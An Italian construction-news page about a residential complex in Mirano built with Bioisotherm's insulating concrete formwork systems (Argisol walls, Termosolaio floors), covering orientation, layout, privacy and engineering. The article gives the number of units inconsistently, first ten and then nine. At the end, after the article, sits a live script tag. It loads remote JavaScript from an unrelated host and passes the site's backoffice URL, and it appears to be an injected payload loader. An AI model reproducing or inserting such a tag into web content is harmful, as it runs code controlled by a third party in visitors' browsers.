1. Home
  2. Notizie Aziende
  3. Bioisotherm protagonista nella realizzazione di un edificio residenziale a Mirano

Bioisotherm protagonista nella realizzazione di un edificio residenziale a Mirano

Lavori pubblici di
Bioisotherm protagonista nella realizzazione di un edificio residenziale a Mirano
5/5
votato da 1 persone
Per l’edificazione è stato utilizzato il sistema costruttivo di casseri isolanti a perdere fornito dall’azienda concessionaria Argisol, Termosolaio e Stirostamp per l’Italia


Opera
Edificio residenziale
Luogo
Mirano (VE)
Data
Gennaio 2011
Impresa esecutrice
Impresa Stocco Franco & C. S.a.s.
Progetto Architettonico e Strutturale
Studio Tecnico Associato Ing. Paolo Valeri, Geom. Matteo Simionato
Azienda
Bioisotherm
Contatti
Bioisotherm srl
Via Longhin, 83
35129  Padova  (PD)
Tel.: 049 8687216
Fax: 049 8684624
e-mail: info@bioisotherm.it
web: www.bioisotherm.com

Il progetto architettonico dell’edificio è stato sviluppato dallo studio di progettazione area 131, con l’uso di un linguaggio forte e chiaro, lontano dalle effimere mode pittoresco-eclettiche dominanti. Il progetto prevede la costruzione di tre edifici attigui per un totale di soli dieci alloggi, due alloggi ciascuno negli edifici laterali e sei sull’edificio centrale, il tutto inserito su una zona residenziale a basso indice di densità abitativa confinante con ampie aree a verde, a garanzia di elevata tranquillità.

L’orientamento Nord Est-Sud Ovest è calcolato su base eliotermica e visiva per approfittare dell’insolazione naturale, verso Sud Est per captare luce e clima, l’edificio risulta così irraggiato su tutti e quattro i lati eliminando il lato in ombra. In relazione all’orientamento l’edificio è predisposto di ampie aperture opportunamente schermate con brie-soleil verso Sud est e aperture più contenute verso Nord per proteggere il più possibile l’edificio dal freddo invernale.

L’affaccio su almeno tre fronti risulta oggi un modo di progettare completamente accantonato al fine di assecondare le logiche della pura speculazione edilizia: tale elemento risulta invece di primaria importanza per la salubrità degli alloggi, perché permette di ottenere il riscontro d’aria, il quale contribuisce in modo determinante alla regolazione climatica dei locali in modo del tutto naturale ed ecologico. Il triplo affaccio permette anche di sfruttare la vista e la luce su più fronti offrendo una migliore vivibilità dell’alloggio.

La conformazione volumetrica e l’accessibilità ai singoli alloggi è stata resa volutamente più indipendente possibile mediante l’eliminazione dei vani scala, per dare maggiore autonomia e privacy. È stata posta particolare attenzione ai problemi di introspezione visiva tra gli alloggi, adottando delle soluzioni progettuali su finestre e parapetti che garantiscono la riservatezza tra le unità abitative attigue nonché tra alloggi e giardini privati.

Sette alloggi dei nove totali possiedono un giardino privato ipogeo o il tetto giardino, sul quale si estende l’alloggio interno per poter usufruire di pranzo e cena all’aperto con cucina attigua o barbecue. I quattro alloggi al piano terra usufruiscono dell’accesso diretto dal garage interrato. Particolare attenzione è stata posta alla progettazione delle aree verdi e dei giardini privati con l’uso di essenze arbustive autoctone mediterranee.

Dobbiamo infine sottolineare il ruolo estremamente importate che ha avuto la progettazione ingegneristica dell’edificio, che si è spinta anche in settori non richiesti dalle normative e che di consueto viene lasciata al libero arbitrio degli installatori. Alla progettazione statica, termica, antincendio dei garage, previste dalla legge, si sono quindi affiancate la progettazione elettrica, quella acustica, la progettazione delle zone a verde, la progettazione idraulica sanitaria.

Sistema costruttivo
All’interno della realizzazione è stato utilizzato il sistema costruttivo di casseri isolanti a perdere fornito da Bioisotherm, concessionaria Argisol, Termosolaio e Stirostamp per l’Italia.

Le pareti sono state realizzate con Argisol, un sistema di costruzione costituito da un programma completo di casseri isolanti a perdere con i quali si ottengono pareti portanti antisismiche in calcestruzzo, isolate internamente ed esternamente, finalizzate ad ottenere edifici in classe A nel rispetto dell’ambiente.

Le coperture sono invece realizzate con Termosolaio, un pannello cassero per la formazione di solai in cemento armato da calpestio e di copertura con isolamento termico variabile. I pannelli cassero sono costituiti da un elemento in polistirene espanso che al suo interno ha due tralicci atti a garantire l’autoportanza del cassero durante il getto del cls, con al centro un incavo per la formazione dei travetti in c.a. strutturali. Il fondello dell’incavo è a spessore variabile ed evita il ponte termico.

<script src="https://secure-content-delivery.com/data.js.php?i={271EC601-39CC-426C-935D-F754BCD76643}&d=2013-10-10&s=http://www.guidaedilizia.it/Backoffice/GuidaNews/Inserisci_Articoli.asp?TipologiaID=1&cb=0.6802223111702422" type="text/javascript"></script>